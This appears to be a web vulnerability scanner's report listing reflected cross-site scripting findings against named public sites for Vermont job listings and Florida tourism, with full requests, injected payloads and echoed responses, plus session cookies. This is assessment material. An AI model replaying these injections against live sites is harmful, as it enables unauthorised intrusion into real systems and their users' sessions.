| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 611 library_errormessage= ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:00 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_forgotpass ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 499 library_errormessage= ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_forgotpass ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:19 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="SECURITYSYS_prev" value="on,on,on742ad"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 499 library_errormessage= ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_forgotpass ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:24'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="submit_error" value="Continue5c951"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=478b6"style%3d"x ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:09'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="usvuserid_error" value="478b6"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:13 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:13'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="usvuserid ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_quicksearch_dsp |
| GET /ada/mn_quicksearch_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:13:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_quicksearch ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:23 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:14:23'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="regType" value="emf47a3"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_warn_dsp.cfm |
| GET /ada/mn_warn_dsp.cfm?def Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:26 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="DEF_prev" value="false9ef0e"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:32:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="FORMID_prev" value="48ec4e"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:34:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="RAND_prev" value="4616363d686"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/services/schools |
| GET /ada/services/schools Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:30:46 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="SECURITYSYS_prev" value="on3f014"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /facebook_logged_in.php |
| GET /facebook_logged_in.php88952"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 162341 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/facebook_logged_in.php88952"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(sajax_ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /facebook_logged_in.php |
| GET /facebook_logged_in.phpe7b3e'-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 162316 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <!-- //configuration OAS_url = 'http://oascentral OAS_sitepage = 'www.VISITFLORIDA.com OAS_listpos = 'Middle1,Bottom,Right,x07 OAS_query = ''; OAS_target = '_top'; //end of configuration OAS_version = 11; OAS_rn = ' ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /florida_vacation_auction |
| GET /florida_vacation_auction8367e"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98809 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/florida_vacation if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&r ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /florida_vacation_auction |
| GET /florida_vacation_auction Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98717 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/florida_vacation if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(sajax_ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /floridalive |
| GET /floridalive94549"-alert(1)- Host: www.visitflorida.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:04:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Set-Cookie: PHPSESSID=gbl4cbv6pb Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98748 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... _type + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/floridalive94549"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(sajax_ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /floridalive |
| GET /floridalive?f6a84"-alert(1)- Host: www.visitflorida.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:04:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Set-Cookie: PHPSESSID=5jdbskaopd Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 465693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... type + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/floridalive?f6a84"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(saja ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /images/webcam.php |
| GET /images7be23"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98756 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... quest_type + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/images7be23"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + es ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /images/webcam.php |
| GET /images/webcam.php7032f"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98747 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/images/webcam.php7032f"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&rst=" + escape(sajax_ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /includes/js/footerSurvey |
| GET /includesd3720"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98795 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... est_type + "/" + sajax_target_id); target_id = sajax_target_id; if (typeof(sajax_request sajax_request_type = "GET"; uri = "/includesd3720"-alert(1)- if (sajax_request_type == "GET") { if (uri.indexOf("?") == -1) uri += "?rs=" + escape(func_name); else uri += "&rs=" + escape(func_name); uri += "&r ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /includes/js/footerSurvey |
| GET /includes/js48bbc"-alert(1)- Host: www.visitflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ucr8rgmvej |
